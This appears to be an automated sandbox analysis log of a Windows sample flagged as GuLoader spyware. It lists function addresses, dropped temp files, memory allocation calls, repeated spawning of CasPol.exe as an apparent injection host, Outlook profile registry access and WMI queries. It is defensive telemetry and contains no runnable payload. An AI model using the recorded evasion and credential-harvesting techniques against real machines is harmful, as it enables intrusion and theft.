Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A7552	0_2_032A7552
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1150	0_2_032A1150
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A7D50	0_2_032A7D50
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A01AB	0_2_032A01AB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A65AD	0_2_032A65AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0DA1	0_2_032A0DA1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0DA5	0_2_032A0DA5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A09B8	0_2_032A09B8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B29B3	0_2_032B29B3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A118B	0_2_032A118B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1988	0_2_032A1988
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA585	0_2_032AA585
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0599	0_2_032A0599
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA599	0_2_032AA599
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AED93	0_2_032AED93
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA5EB	0_2_032AA5EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1DE8	0_2_032A1DE8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A11FA	0_2_032A11FA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0DFB	0_2_032A0DFB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A09FF	0_2_032A09FF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A05CA	0_2_032A05CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1DCA	0_2_032A1DCA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A11C7	0_2_032A11C7
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A25D9	0_2_032A25D9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A19D0	0_2_032A19D0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA429	0_2_032AA429
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA833	0_2_032AA833
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0808	0_2_032A0808
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0003	0_2_032A0003
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A6400	0_2_032A6400
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A7C06	0_2_032A7C06
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A041B	0_2_032A041B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A181F	0_2_032A181F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A981D	0_2_032A981D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A2013	0_2_032A2013
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A6013	0_2_032A6013
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0015	0_2_032A0015
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA469	0_2_032AA469
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B0C6F	0_2_032B0C6F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AE06D	0_2_032AE06D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0460	0_2_032A0460
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1067	0_2_032A1067
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B2C66	0_2_032B2C66
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A007B	0_2_032A007B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1C7B	0_2_032A1C7B
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A347E	0_2_032A347E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A087D	0_2_032A087D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A184E	0_2_032A184E
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A004C	0_2_032A004C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A204C	0_2_032A204C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1C45	0_2_032A1C45
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AAC45	0_2_032AAC45
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1CAC	0_2_032A1CAC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AA8AC	0_2_032AA8AC
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A7CA3	0_2_032A7CA3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A00BA	0_2_032A00BA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A74BB	0_2_032A74BB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A74BF	0_2_032A74BF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A64BD	0_2_032A64BD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A208A	0_2_032A208A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A5C87	0_2_032A5C87
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A049D	0_2_032A049D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1892	0_2_032A1892
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A00EB	0_2_032A00EB
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A10E8	0_2_032A10E8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A24EE	0_2_032A24EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A08EF	0_2_032A08EF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A1CE3	0_2_032A1CE3
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B0CE1	0_2_032B0CE1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A70CA	0_2_032A70CA
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A18C8	0_2_032A18C8
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A08CF	0_2_032A08CF
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A0CCD	0_2_032A0CCD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032AACD9	0_2_032AACD9
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A04DE	0_2_032A04DE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A20D0	0_2_032A20D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00F12573	12_2_00F12573
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_00F124A2	12_2_00F124A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1D586B62	12_2_1D586B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1D58A160	12_2_1D58A160
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1D589890	12_2_1D589890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1D589548	12_2_1D589548
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC46E10	12_2_1FC46E10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC47D85	12_2_1FC47D85
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC4AC18	12_2_1FC4AC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC44730	12_2_1FC44730
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC4DA18	12_2_1FC4DA18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC471C0	12_2_1FC471C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC4D9BA	12_2_1FC4D9BA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC4008B	12_2_1FC4008B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC40090	12_2_1FC40090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D2C68	12_2_205D2C68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D80F0	12_2_205D80F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DA147	12_2_205DA147
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DF108	12_2_205DF108
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D3310	12_2_205D3310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D4CB0	12_2_205D4CB0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B3B34 NtProtectVirtualMemory,		0_2_032B3B34
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B1DB7 NtAllocateVirtualMemory,		0_2_032B1DB7

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Process Stats: CPU usage > 98%

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1921654388.000000000040A000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystem.IO.UnmanagedMemoryStream.dll@ vs SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe
Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe, 00000000.00000002.1923518409.0000000002876000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystem.IO.UnmanagedMemoryStream.dll@ vs SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Section loaded: edgegdi.dll			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: edgegdi.dll			Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Static PE information: invalid certificate

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

File read: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

0_2_00403640

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

File created: C:\Users\user\AppData\Local\Temp\nsj52FD.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/10@0/2

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Code function: 0_2_004021AA CoCreateInstance,

0_2_004021AA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Code function: 0_2_00404AB5 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

0_2_00404AB5

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3384:304:WilStaging_02

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:

Data Obfuscation

Yara detected GuLoader

Source: Yara match	File source: 0000000C.00000000.1265287486.0000000000F00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1924258276.00000000032A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_742530C0 push eax; ret	0_2_742530EE
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A43BE push FFFFFFECh; retn F381h	0_2_032A478D
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032B1DB7 push A8C34522h; ret	0_2_032B21F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A3C4A push 743CFB60h; retn 8ECCh	0_2_032A3A2F
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A3B39 push ebx; iretd	0_2_032A3B3A
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A5F08 push A096CC56h; retf	0_2_032A5F19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A339B push ecx; ret	0_2_032A33AD
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A427E push edx; iretd	0_2_032A4288
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A4070 push FFFFFF81h; ret	0_2_032A4093
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Code function: 0_2_032A30CA push ebx; retf E547h	0_2_032A316A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_1FC4CE80 push esp; iretd	12_2_1FC4CE81
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DE04B push eax; ret	12_2_205DE052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D1479 push ebx; ret	12_2_205D147A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D2871 pushad ; ret	12_2_205D2872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DDC06 push esp; ret	12_2_205DDC07
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DE030 push eax; ret	12_2_205DE032
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D1023 push eax; ret	12_2_205D102A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DDCC9 push esp; ret	12_2_205DDCCA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D28C3 pushad ; ret	12_2_205D291A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D18E3 push esi; ret	12_2_205D1932
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DE09D push eax; ret	12_2_205DE0A3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D809B pushfd ; ret	12_2_205D80E2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D1483 push ebx; ret	12_2_205D14CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DE0BF push eax; ret	12_2_205DE0C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DD951 push edi; ret	12_2_205DD958
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DDD42 push ebx; ret	12_2_205DDD49
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DD976 push edi; ret	12_2_205DD978
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D193B push esi; ret	12_2_205D1982
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DDD2A push ebx; ret	12_2_205DDD2B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205DD9D8 push esi; ret	12_2_205DD9DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 12_2_205D19D3 push esi; ret	12_2_205D19DA

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe

Code function: 0_2_74251BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_74251BFF

Source: System.IO.UnmanagedMemoryStream.dll.0.dr

Static PE information: 0xFD78D1DD [Sat Oct 4 08:54:53 2104 UTC]

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	File created: C:\Users\user\AppData\Local\Temp\nse53CA.tmp\System.dll			Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	File created: C:\Users\user\AppData\Local\Temp\System.IO.UnmanagedMemoryStream.dll			Jump to dropped file

Source: C:\Users\user\Desktop\SecuriteInfo.com.Gen.Variant.Nemesis.6939.7902.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
